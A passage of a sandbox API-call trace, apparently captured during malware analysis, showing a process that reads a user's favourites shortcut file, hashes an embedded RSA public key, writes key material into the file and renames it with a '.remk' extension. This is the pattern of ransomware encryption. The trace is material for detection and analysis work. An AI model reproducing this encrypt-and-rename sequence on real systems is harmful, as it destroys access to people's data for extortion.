(pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned=".url" [0234.081] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.081] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=133) returned 1 [0234.081] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.084] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.084] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.086] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.086] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x85, lpOverlapped=0x0) returned 1 [0234.086] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0234.086] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.086] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.086] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0234.087] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.087] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.087] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0234.087] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.087] GetLastError () returned 0x0 [0234.087] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.088] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0234.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.088] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.088] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.088] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e698 [0234.088] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0234.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0234.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0234.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0234.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bbe40 [0234.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee5e0 [0234.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bbe88 [0234.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee5f8 [0234.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee628 [0234.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee688 [0234.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee640 [0234.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0234.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0234.089] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.089] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee628 | out: hHeap=0x630000) returned 1 [0234.089] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee640 | out: hHeap=0x630000) returned 1 [0234.089] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee688 | out: hHeap=0x630000) returned 1 [0234.089] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0234.089] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee688 [0234.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0234.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee640 [0234.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0234.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee628 [0234.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0234.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x3192918 [0234.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0234.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0234.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0234.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0234.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0234.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.090] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.090] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee640 | out: hHeap=0x630000) returned 1 [0234.090] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.090] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee628 | out: hHeap=0x630000) returned 1 [0234.090] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0234.090] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.090] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee688 | out: hHeap=0x630000) returned 1 [0234.090] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0234.090] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0234.090] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0234.090] GetCurrentThreadId () returned 0x314 [0234.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0234.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c2950 [0234.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0234.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0234.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0234.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0234.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0234.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.090] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.090] GetCurrentThreadId () returned 0x314 [0234.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.091] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0234.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.091] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.091] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.091] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0234.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0234.091] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0234.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0234.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee688 [0234.091] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0234.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0234.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0234.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0234.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0234.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee628 [0234.092] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0234.092] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0234.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0234.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0234.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee640 [0234.092] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0234.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0234.092] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0234.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee610 [0234.092] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0234.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6a0 [0234.092] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0234.092] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0234.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee670 [0234.092] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee658 [0234.092] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0234.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee6b8 [0234.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee658 | out: hHeap=0x630000) returned 1 [0234.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee658 [0234.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee670 | out: hHeap=0x630000) returned 1 [0234.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0234.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0234.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0234.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0234.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee628 | out: hHeap=0x630000) returned 1 [0234.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee628 [0234.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x37c0db8 [0234.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee688 | out: hHeap=0x630000) returned 1 [0234.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0234.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6b8 | out: hHeap=0x630000) returned 1 [0234.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0fc8 [0234.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0234.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0234.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0234.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0234.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee628 | out: hHeap=0x630000) returned 1 [0234.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5b70 [0234.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0234.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0234.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0234.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0234.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0234.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0234.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0234.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fc8 | out: hHeap=0x630000) returned 1 [0234.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0234.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0234.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee658 | out: hHeap=0x630000) returned 1 [0234.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0234.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6a0 | out: hHeap=0x630000) returned 1 [0234.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0234.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee640 | out: hHeap=0x630000) returned 1 [0234.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee610 | out: hHeap=0x630000) returned 1 [0234.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0234.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0234.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0234.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee5f8 | out: hHeap=0x630000) returned 1 [0234.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bbe88 | out: hHeap=0x630000) returned 1 [0234.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0234.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0234.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0234.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0234.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0234.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0234.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0234.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0234.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.095] WriteFile (in: hFile=0x640, lpBuffer=0x65e698*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x65e698*, lpNumberOfBytesWritten=0x3adfb14*=0x80, lpOverlapped=0x0) returned 1 [0234.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e698 | out: hHeap=0x630000) returned 1 [0234.096] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.096] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.096] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711900 [0234.096] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0234.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0234.096] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37c0db8 [0234.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711900 | out: hHeap=0x630000) returned 1 [0234.096] WriteFile (in: hFile=0x640, lpBuffer=0x37c0db8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37c0db8*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0234.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0234.097] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.097] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.097] CloseHandle (hObject=0x640) returned 1 [0234.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0234.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x37bc408 [0234.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6420 | out: hHeap=0x630000) returned 1 [0234.098] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.remk")) returned 1 [0234.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc408 | out: hHeap=0x630000) returned 1 [0234.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 